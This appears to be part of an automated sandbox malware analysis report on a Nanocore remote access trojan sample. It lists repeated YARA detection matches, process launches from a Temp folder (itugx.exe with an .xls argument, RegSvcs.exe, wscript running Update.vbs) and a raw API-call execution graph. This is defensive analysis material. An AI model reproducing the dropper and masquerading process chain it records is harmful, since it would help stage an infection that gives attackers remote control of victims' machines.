                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:24
                                                  Start time:08:11:00
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x6f0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:25
                                                  Start time:08:11:04
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:26
                                                  Start time:08:11:11
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x6c0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:27
                                                  Start time:08:11:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  Target ID:28
                                                  Start time:08:11:16
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_AntiVM_1, Description: Yara detected AntiVM autoit script, Source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  Target ID:30
                                                  Start time:08:11:21
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x950000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:31
                                                  Start time:08:11:35
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0xe70000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET


                                                    Execution Graph

                                                    Execution Coverage:10.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:10.3%
                                                    Total number of Nodes:1505
                                                    Total number of Limit Nodes:43
API calls ___delayLoadHelper2@8 25407 cdf4d3 20 API calls 25485 cea3d0 21 API calls 2 library calls 25486 cf2bd0 VariantClear 25443 ccf1e8 FreeLibrary 23817 cdeae7 23818 cdeaf1 23817->23818 23819 cde85d ___delayLoadHelper2@8 14 API calls 23818->23819 23820 cdeafe 23819->23820 25408 cdf4e7 29 API calls _abort 23821 cdb7e0 23822 cdb7ea __EH_prolog 23821->23822 23989 cc1316 23822->23989 23825 cdbf0f 24061 cdd69e 23825->24061 23826 cdb82a 23828 cdb838 23826->23828 23829 cdb89b 23826->23829 23901 cdb841 23826->23901 23832 cdb83c 23828->23832 23833 cdb878 23828->23833 23831 cdb92e GetDlgItemTextW 23829->23831 23836 cdb8b1 23829->23836 23831->23833 23839 cdb96b 23831->23839 23843 cce617 53 API calls 23832->23843 23832->23901 23840 cdb95f EndDialog 23833->23840 23833->23901 23834 cdbf38 23837 cdbf41 SendDlgItemMessageW 23834->23837 23838 cdbf52 GetDlgItem SendMessageW 23834->23838 23835 cdbf2a SendMessageW 23835->23834 23842 cce617 53 API calls 23836->23842 23837->23838 24079 cda64d GetCurrentDirectoryW 23838->24079 23841 cdb980 GetDlgItem 23839->23841 23987 cdb974 23839->23987 23840->23901 23845 cdb994 SendMessageW SendMessageW 23841->23845 23846 cdb9b7 SetFocus 23841->23846 23847 cdb8ce SetDlgItemTextW 23842->23847 23848 cdb85b 23843->23848 23845->23846 23850 cdb9c7 23846->23850 23866 cdb9e0 23846->23866 23851 cdb8d9 23847->23851 24101 cc124f SHGetMalloc 23848->24101 23849 cdbf82 GetDlgItem 23853 cdbf9f 23849->23853 23854 cdbfa5 SetWindowTextW 23849->23854 23856 cce617 53 API calls 23850->23856 23860 cdb8e6 GetMessageW 23851->23860 23851->23901 23853->23854 24080 cdabab GetClassNameW 23854->24080 23861 cdb9d1 23856->23861 23857 cdbe55 23858 cce617 53 API calls 23857->23858 23862 cdbe65 SetDlgItemTextW 23858->23862 23864 cdb8fd IsDialogMessageW 23860->23864 23860->23901 24102 cdd4d4 23861->24102 23868 cdbe79 23862->23868 23864->23851 23870 cdb90c TranslateMessage DispatchMessageW 23864->23870 23871 cce617 53 API calls 23866->23871 23867 cdc1fc SetDlgItemTextW 23867->23901 
23873 cce617 53 API calls 23868->23873 23870->23851 23872 cdba17 23871->23872 23875 cc4092 _swprintf 51 API calls 23872->23875 23909 cdbe9c _wcslen 23873->23909 23874 cdbff0 23878 cdc020 23874->23878 23881 cce617 53 API calls 23874->23881 23880 cdba29 23875->23880 23876 cdc73f 97 API calls 23876->23874 23877 cdb9d9 23999 cca0b1 23877->23999 23883 cdc73f 97 API calls 23878->23883 23914 cdc0d8 23878->23914 23885 cdd4d4 16 API calls 23880->23885 23886 cdc003 SetDlgItemTextW 23881->23886 23890 cdc03b 23883->23890 23884 cdc18b 23891 cdc19d 23884->23891 23892 cdc194 EnableWindow 23884->23892 23885->23877 23893 cce617 53 API calls 23886->23893 23887 cdba68 GetLastError 23888 cdba73 23887->23888 24005 cdac04 SetCurrentDirectoryW 23888->24005 23896 cdc072 23890->23896 23902 cdc04d 23890->23902 23897 cdc1ba 23891->23897 24120 cc12d3 GetDlgItem EnableWindow 23891->24120 23892->23891 23898 cdc017 SetDlgItemTextW 23893->23898 23894 cdba87 23899 cdba9e 23894->23899 23900 cdba90 GetLastError 23894->23900 23895 cce617 53 API calls 23895->23901 23903 cdc0cb 23896->23903 23939 cdc73f 97 API calls 23896->23939 23905 cdc1e1 23897->23905 23910 cdc1d9 SendMessageW 23897->23910 23898->23878 23911 cdbaae GetTickCount 23899->23911 23912 cdbb20 23899->23912 23964 cdbb11 23899->23964 23900->23899 24118 cd9ed5 32 API calls 23902->24118 23906 cdc73f 97 API calls 23903->23906 23905->23901 23913 cce617 53 API calls 23905->23913 23906->23914 23908 cdc1b0 24121 cc12d3 GetDlgItem EnableWindow 23908->24121 23915 cce617 53 API calls 23909->23915 23935 cdbeed 23909->23935 23910->23905 23920 cc4092 _swprintf 51 API calls 23911->23920 23924 cdbcfb 23912->23924 23925 cdbb39 GetModuleFileNameW 23912->23925 23926 cdbcf1 23912->23926 23921 cdb862 23913->23921 23914->23884 23923 cdc169 23914->23923 23934 cce617 53 API calls 23914->23934 23922 cdbed0 23915->23922 23916 cdbd56 24021 cc12f1 GetDlgItem ShowWindow 23916->24021 23917 cdc066 23917->23896 23933 cdbac7 23920->23933 23921->23867 23921->23901 23928 
cc4092 _swprintf 51 API calls 23922->23928 24119 cd9ed5 32 API calls 23923->24119 23931 cce617 53 API calls 23924->23931 24112 ccf28c 82 API calls 23925->24112 23926->23833 23926->23924 23927 cdbd66 24022 cc12f1 GetDlgItem ShowWindow 23927->24022 23928->23935 23938 cdbd05 23931->23938 24006 cc966e 23933->24006 23934->23914 23935->23895 23936 cdc188 23936->23884 23937 cdbb5f 23942 cc4092 _swprintf 51 API calls 23937->23942 23943 cc4092 _swprintf 51 API calls 23938->23943 23940 cdc0a0 23939->23940 23940->23903 23944 cdc0a9 DialogBoxParamW 23940->23944 23941 cdbd70 23945 cce617 53 API calls 23941->23945 23947 cdbb81 CreateFileMappingW 23942->23947 23948 cdbd23 23943->23948 23944->23833 23944->23903 23949 cdbd7a SetDlgItemTextW 23945->23949 23951 cdbbe3 GetCommandLineW 23947->23951 23981 cdbc60 __InternalCxxFrameHandler 23947->23981 23960 cce617 53 API calls 23948->23960 24023 cc12f1 GetDlgItem ShowWindow 23949->24023 23950 cdbaed 23954 cdbaf4 GetLastError 23950->23954 23955 cdbaff 23950->23955 23956 cdbbf4 23951->23956 23952 cdbc6b ShellExecuteExW 23979 cdbc88 23952->23979 23954->23955 24014 cc959a 23955->24014 24113 cdb425 SHGetMalloc 23956->24113 23957 cdbd8c SetDlgItemTextW GetDlgItem 23962 cdbda9 GetWindowLongW SetWindowLongW 23957->23962 23963 cdbdc1 23957->23963 23961 cdbd3d 23960->23961 23962->23963 24024 cdc73f 23963->24024 23964->23912 23964->23916 23965 cdbc10 24114 cdb425 SHGetMalloc 23965->24114 23968 cdbc1c 24115 cdb425 SHGetMalloc 23968->24115 23971 cdbccb 23971->23926 23977 cdbce1 UnmapViewOfFile CloseHandle 23971->23977 23972 cdc73f 97 API calls 23974 cdbddd 23972->23974 23973 cdbc28 24116 ccf3fa 82 API calls 2 library calls 23973->24116 24049 cdda52 23974->24049 23977->23926 23978 cdbc3f MapViewOfFile 23978->23981 23979->23971 23982 cdbcb7 Sleep 23979->23982 23981->23952 23982->23971 23982->23979 23983 cdc73f 97 API calls 23986 cdbe03 23983->23986 23984 cdbe2c 24117 cc12d3 GetDlgItem EnableWindow 23984->24117 23986->23984 23988 cdc73f 97 API calls 
23986->23988 23987->23833 23987->23857 23988->23984 23990 cc131f 23989->23990 23991 cc1378 23989->23991 23993 cc1385 23990->23993 24122 cce2e8 62 API calls 2 library calls 23990->24122 24123 cce2c1 GetWindowLongW SetWindowLongW 23991->24123 23993->23825 23993->23826 23993->23901 23995 cc1341 23995->23993 23996 cc1354 GetDlgItem 23995->23996 23996->23993 23997 cc1364 23996->23997 23997->23993 23998 cc136a SetWindowTextW 23997->23998 23998->23993 24002 cca0bb 23999->24002 24000 cca14c 24001 cca2b2 8 API calls 24000->24001 24003 cca175 24000->24003 24001->24003 24002->24000 24002->24003 24124 cca2b2 24002->24124 24003->23887 24003->23888 24005->23894 24007 cc9678 24006->24007 24008 cc96d5 CreateFileW 24007->24008 24009 cc96c9 24007->24009 24008->24009 24010 cc971f 24009->24010 24011 ccbb03 GetCurrentDirectoryW 24009->24011 24010->23950 24012 cc9704 24011->24012 24012->24010 24013 cc9708 CreateFileW 24012->24013 24013->24010 24015 cc95be 24014->24015 24020 cc95cf 24014->24020 24016 cc95ca 24015->24016 24017 cc95d1 24015->24017 24015->24020 24145 cc974e 24016->24145 24150 cc9620 24017->24150 24020->23964 24021->23927 24022->23941 24023->23957 24025 cdc749 __EH_prolog 24024->24025 24026 cdbdcf 24025->24026 24027 cdb314 ExpandEnvironmentStringsW 24025->24027 24026->23972 24028 cdc780 _wcslen _wcsrchr 24027->24028 24028->24026 24030 cdb314 ExpandEnvironmentStringsW 24028->24030 24031 cdca67 SetWindowTextW 24028->24031 24034 ce3e3e 22 API calls 24028->24034 24036 cdc855 SetFileAttributesW 24028->24036 24041 cdcc31 GetDlgItem SetWindowTextW SendMessageW 24028->24041 24044 cdcc71 SendMessageW 24028->24044 24165 cd1fbb CompareStringW 24028->24165 24166 cda64d GetCurrentDirectoryW 24028->24166 24168 cca5d1 6 API calls 24028->24168 24169 cca55a FindClose 24028->24169 24170 cdb48e 76 API calls 2 library calls 24028->24170 24030->24028 24031->24028 24034->24028 24038 cdc90f GetFileAttributesW 24036->24038 24048 cdc86f __cftof _wcslen 24036->24048 24038->24028 24040 cdc921 
DeleteFileW 24038->24040 24040->24028 24042 cdc932 24040->24042 24041->24028 24043 cc4092 _swprintf 51 API calls 24042->24043 24045 cdc952 GetFileAttributesW 24043->24045 24044->24028 24045->24042 24046 cdc967 MoveFileW 24045->24046 24046->24028 24047 cdc97f MoveFileExW 24046->24047 24047->24028 24048->24028 24048->24038 24167 ccb991 51 API calls 2 library calls 24048->24167 24050 cdda5c __EH_prolog 24049->24050 24171 cd0659 24050->24171 24052 cdda8d 24175 cc5b3d 24052->24175 24054 cddaab 24179 cc7b0d 24054->24179 24058 cddafe 24195 cc7b9e 24058->24195 24060 cdbdee 24060->23983 24062 cdd6a8 24061->24062 24711 cda5c6 24062->24711 24065 cdd6b5 GetWindow 24066 cdbf15 24065->24066 24072 cdd6d5 24065->24072 24066->23834 24066->23835 24067 cdd6e2 GetClassNameW 24716 cd1fbb CompareStringW 24067->24716 24069 cdd76a GetWindow 24069->24066 24069->24072 24070 cdd706 GetWindowLongW 24070->24069 24071 cdd716 SendMessageW 24070->24071 24071->24069 24073 cdd72c GetObjectW 24071->24073 24072->24066 24072->24067 24072->24069 24072->24070 24717 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24073->24717 24075 cdd743 24718 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24075->24718 24719 cda80c 8 API calls 24075->24719 24078 cdd754 SendMessageW DeleteObject 24078->24069 24079->23849 24081 cdabcc 24080->24081 24082 cdabf1 24080->24082 24722 cd1fbb CompareStringW 24081->24722 24084 cdabff 24082->24084 24085 cdabf6 SHAutoComplete 24082->24085 24088 cdb093 24084->24088 24085->24084 24086 cdabdf 24086->24082 24087 cdabe3 FindWindowExW 24086->24087 24087->24082 24089 cdb09d __EH_prolog 24088->24089 24090 cc13dc 84 API calls 24089->24090 24091 cdb0bf 24090->24091 24723 cc1fdc 24091->24723 24094 cdb0d9 24096 cc1692 86 API calls 24094->24096 24095 cdb0eb 24097 cc19af 128 API calls 24095->24097 24098 cdb0e4 24096->24098 24100 cdb10d __InternalCxxFrameHandler ___std_exception_copy 24097->24100 24098->23874 24098->23876 24099 cc1692 86 API calls 24099->24098 24100->24099 24101->23921 
24103 cdb568 5 API calls 24102->24103 24104 cdd4e0 GetDlgItem 24103->24104 24105 cdd536 SendMessageW SendMessageW 24104->24105 24106 cdd502 24104->24106 24107 cdd591 SendMessageW SendMessageW SendMessageW 24105->24107 24108 cdd572 24105->24108 24109 cdd50d ShowWindow SendMessageW SendMessageW 24106->24109 24110 cdd5c4 SendMessageW 24107->24110 24111 cdd5e7 SendMessageW 24107->24111 24108->24107 24109->24105 24110->24111 24111->23877 24112->23937 24113->23965 24114->23968 24115->23973 24116->23978 24117->23987 24118->23917 24119->23936 24120->23908 24121->23897 24122->23995 24123->23993 24125 cca2bf 24124->24125 24126 cca2e3 24125->24126 24127 cca2d6 CreateDirectoryW 24125->24127 24128 cca231 3 API calls 24126->24128 24127->24126 24129 cca316 24127->24129 24130 cca2e9 24128->24130 24132 cca325 24129->24132 24137 cca4ed 24129->24137 24131 cca329 GetLastError 24130->24131 24133 ccbb03 GetCurrentDirectoryW 24130->24133 24131->24132 24132->24002 24135 cca2ff 24133->24135 24135->24131 24136 cca303 CreateDirectoryW 24135->24136 24136->24129 24136->24131 24138 cdec50 24137->24138 24139 cca4fa SetFileAttributesW 24138->24139 24140 cca53d 24139->24140 24141 cca510 24139->24141 24140->24132 24142 ccbb03 GetCurrentDirectoryW 24141->24142 24143 cca524 24142->24143 24143->24140 24144 cca528 SetFileAttributesW 24143->24144 24144->24140 24146 cc9781 24145->24146 24147 cc9757 24145->24147 24146->24020 24147->24146 24156 cca1e0 24147->24156 24152 cc964a 24150->24152 24153 cc962c 24150->24153 24151 cc9669 24151->24020 24152->24151 24164 cc6bd5 76 API calls 24152->24164 24153->24152 24154 cc9638 FindCloseChangeNotification 24153->24154 24154->24152 24157 cdec50 24156->24157 24158 cca1ed DeleteFileW 24157->24158 24159 cc977f 24158->24159 24160 cca200 24158->24160 24159->24020 24161 ccbb03 GetCurrentDirectoryW 24160->24161 24162 cca214 24161->24162 24162->24159 24163 cca218 DeleteFileW 24162->24163 24163->24159 24164->24151 24165->24028 24166->24028 24167->24048 24168->24028 
